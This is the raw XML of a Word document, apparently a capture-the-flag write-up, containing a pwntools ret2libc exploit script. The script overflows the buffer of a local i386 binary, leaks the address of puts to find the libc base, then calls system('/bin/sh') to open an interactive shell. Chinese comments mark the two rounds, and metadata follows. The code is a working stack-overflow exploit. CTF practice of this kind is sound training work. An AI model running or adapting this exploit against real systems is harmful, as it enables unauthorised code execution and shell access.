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B3569" w14:textId="77777777" w:rsidR="007609CE" w:rsidRPr="007609CE" w:rsidRDefault="007609CE" w:rsidP="007609CE">
      <w:r w:rsidRPr="007609CE">
        <w:t>from pwn import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="199CE9A5" w14:textId="77777777" w:rsidR="007609CE" w:rsidRPr="007609CE" w:rsidRDefault="007609CE" w:rsidP="007609CE">
      <w:r w:rsidRPr="007609CE">
        <w:t>from LibcSearcher import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33BC1305" w14:textId="77777777" w:rsidR="007609CE" w:rsidRPr="007609CE" w:rsidRDefault="007609CE" w:rsidP="007609CE"/>
    <w:p w14:paraId="51326382" w14:textId="77777777" w:rsidR="007609CE" w:rsidRPr="007609CE" w:rsidRDefault="007609CE" w:rsidP="007609CE">
      <w:r w:rsidRPr="007609CE">
        <w:t>context(arch='i386', os='linux')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15205104" w14:textId="77777777" w:rsidR="007609CE" w:rsidRPr="007609CE" w:rsidRDefault="007609CE" w:rsidP="007609CE"/>
    <w:p w14:paraId="13D0B151" w14:textId="77777777" w:rsidR="007609CE" w:rsidRPr="007609CE" w:rsidRDefault="007609CE" w:rsidP="007609CE">
      <w:r w:rsidRPr="007609CE">
        <w:t>p = process('./pwn')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482F2001" w14:textId="77777777" w:rsidR="007609CE" w:rsidRPr="007609CE" w:rsidRDefault="007609CE" w:rsidP="007609CE">
      <w:r w:rsidRPr="007609CE">
        <w:t>libc = ELF('./libc.so.6')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52EBAD50" w14:textId="77777777" w:rsidR="007609CE" w:rsidRPr="007609CE" w:rsidRDefault="007609CE" w:rsidP="007609CE">
      <w:r w:rsidRPr="007609CE">
        <w:t>elf = ELF('./pwn')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3664C5EE" w14:textId="77777777" w:rsidR="007609CE" w:rsidRPr="007609CE" w:rsidRDefault="007609CE" w:rsidP="007609CE">
      <w:r w:rsidRPr="007609CE">
        <w:t># 第一轮：泄露puts地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530A1C91" w14:textId="77777777" w:rsidR="007609CE" w:rsidRPr="007609CE" w:rsidRDefault="007609CE" w:rsidP="007609CE">
      <w:r w:rsidRPr="007609CE">
        <w:t>puts_plt = elf.plt['puts']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F6D01A" w14:textId="77777777" w:rsidR="007609CE" w:rsidRPr="007609CE" w:rsidRDefault="007609CE" w:rsidP="007609CE">
      <w:r w:rsidRPr="007609CE">
        <w:t>puts_got = elf.got['puts']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="289A3EBA" w14:textId="77777777" w:rsidR="007609CE" w:rsidRPr="007609CE" w:rsidRDefault="007609CE" w:rsidP="007609CE">
      <w:r w:rsidRPr="007609CE">
        <w:t>main_addr = elf.sym['main']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="406531C6" w14:textId="77777777" w:rsidR="007609CE" w:rsidRPr="007609CE" w:rsidRDefault="007609CE" w:rsidP="007609CE">
      <w:r w:rsidRPr="007609CE">
        <w:t>padding = 0x48+0x04</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0533485C" w14:textId="77777777" w:rsidR="007609CE" w:rsidRPr="007609CE" w:rsidRDefault="007609CE" w:rsidP="007609CE">
      <w:r w:rsidRPr="007609CE">
        <w:t>payload = b'A'* padding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6B9338" w14:textId="77777777" w:rsidR="007609CE" w:rsidRPr="007609CE" w:rsidRDefault="007609CE" w:rsidP="007609CE">
      <w:r w:rsidRPr="007609CE">
        <w:t>payload += p32(puts_plt) + p32(main_addr) + p32(puts_got)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08FB7BC0" w14:textId="77777777" w:rsidR="007609CE" w:rsidRPr="007609CE" w:rsidRDefault="007609CE" w:rsidP="007609CE">
      <w:r w:rsidRPr="007609CE">
        <w:t>p.sendlineafter(b"Input: ", payload)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C73544" w14:textId="77777777" w:rsidR="007609CE" w:rsidRPr="007609CE" w:rsidRDefault="007609CE" w:rsidP="007609CE"/>
    <w:p w14:paraId="1F53343E" w14:textId="77777777" w:rsidR="007609CE" w:rsidRPr="007609CE" w:rsidRDefault="007609CE" w:rsidP="007609CE">
      <w:r w:rsidRPr="007609CE">
        <w:t>leaked_puts = u32(p.recv(4))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5607ED63" w14:textId="77777777" w:rsidR="007609CE" w:rsidRPr="007609CE" w:rsidRDefault="007609CE" w:rsidP="007609CE">
      <w:r w:rsidRPr="007609CE">
        <w:t>#libc = LibcSearcher('puts', leaked_puts)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="092AD805" w14:textId="77777777" w:rsidR="007609CE" w:rsidRPr="007609CE" w:rsidRDefault="007609CE" w:rsidP="007609CE">
      <w:r w:rsidRPr="007609CE">
        <w:t>#libc_base = leaked_puts - libc.dump('puts')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BADDE41" w14:textId="77777777" w:rsidR="007609CE" w:rsidRPr="007609CE" w:rsidRDefault="007609CE" w:rsidP="007609CE">
      <w:r w:rsidRPr="007609CE">
        <w:t>#system = libc_base + libc.dump('system')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6834446B" w14:textId="77777777" w:rsidR="007609CE" w:rsidRPr="007609CE" w:rsidRDefault="007609CE" w:rsidP="007609CE">
      <w:r w:rsidRPr="007609CE">
        <w:t>#bin_sh = libc_base + libc.dump('str_bin_sh')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3831B0C9" w14:textId="77777777" w:rsidR="007609CE" w:rsidRPr="007609CE" w:rsidRDefault="007609CE" w:rsidP="007609CE">
      <w:r w:rsidRPr="007609CE">
        <w:t>libc_base = leaked_puts - libc.sym['puts']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6557E8C8" w14:textId="77777777" w:rsidR="007609CE" w:rsidRPr="007609CE" w:rsidRDefault="007609CE" w:rsidP="007609CE">
      <w:r w:rsidRPr="007609CE">
        <w:t>system_add = libc_base + libc.sym['system']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788A31B8" w14:textId="77777777" w:rsidR="007609CE" w:rsidRPr="007609CE" w:rsidRDefault="007609CE" w:rsidP="007609CE">
      <w:r w:rsidRPr="007609CE">
        <w:t>binsh_add = libc_base + next(libc.search(b'/bin/sh'))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A263B7" w14:textId="77777777" w:rsidR="007609CE" w:rsidRPr="007609CE" w:rsidRDefault="007609CE" w:rsidP="007609CE">
      <w:r w:rsidRPr="007609CE">
        <w:t># 第二轮：获取shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D857B2" w14:textId="77777777" w:rsidR="007609CE" w:rsidRPr="007609CE" w:rsidRDefault="007609CE" w:rsidP="007609CE">
      <w:r w:rsidRPr="007609CE">
        <w:t>payload = b'A'* padding + p32(system_add) + p32(0xdeadbeef) + p32(binsh_add)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA916F0" w14:textId="77777777" w:rsidR="007609CE" w:rsidRPr="007609CE" w:rsidRDefault="007609CE" w:rsidP="007609CE">
      <w:r w:rsidRPr="007609CE">
        <w:t>p.sendlineafter(b"Input: ", payload)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E1D5C6" w14:textId="77777777" w:rsidR="007609CE" w:rsidRPr="007609CE" w:rsidRDefault="007609CE" w:rsidP="007609CE">
      <w:r w:rsidRPr="007609CE">
        <w:t>p.interactive()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD2C593" w14:textId="77777777" w:rsidR="007609CE" w:rsidRPr="007609CE" w:rsidRDefault="007609CE" w:rsidP="007609CE"/>
    <w:p w14:paraId="3D8C312B" w14:textId="77777777" w:rsidR="007609CE" w:rsidRDefault="007609CE"/>
    <w:p w14:paraId="7BBBFAA7" w14:textId="64F59CC5" w:rsidR="000C412A" w:rsidRDefault="00C3576F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C3576F">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5397A1E5" wp14:editId="2D7FB62C">
            <wp:extent cx="5274310" cy="4124325"/>
            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
            <wp:docPr id="2403153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153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1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FA4"/>
    <w:rsid w:val="000C412A"/>
    <w:rsid w:val="001468F4"/>
    <w:rsid w:val="00280F85"/>
    <w:rsid w:val="005D4495"/>
    <w:rsid w:val="007609CE"/>
    <w:rsid w:val="008A0FA4"/>
    <w:rsid w:val="008A5C04"/>
    <w:rsid w:val="008A6BB9"/>
    <w:rsid w:val="00C3576F"/>
    <w:rsid w:val="00CA1913"/>
    <w:rsid w:val="00EA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5F003"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{961DDE26-B547-49D7-A05D-4EB128840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0FA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0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0FA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0FA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0FA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0FA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0FA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0FA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0FA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0FA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A0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A0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A0FA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A0FA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A0FA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A0FA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A0FA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A0FA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A0FA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A0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0FA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A0FA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A0F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A0FA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0FA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A0FA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A0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A0FA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A0F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obrine him</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>obrine him</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-04-23T03:41:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-04-23T03:42:00Z</dcterms:modified>
</cp:coreProperties>
</file>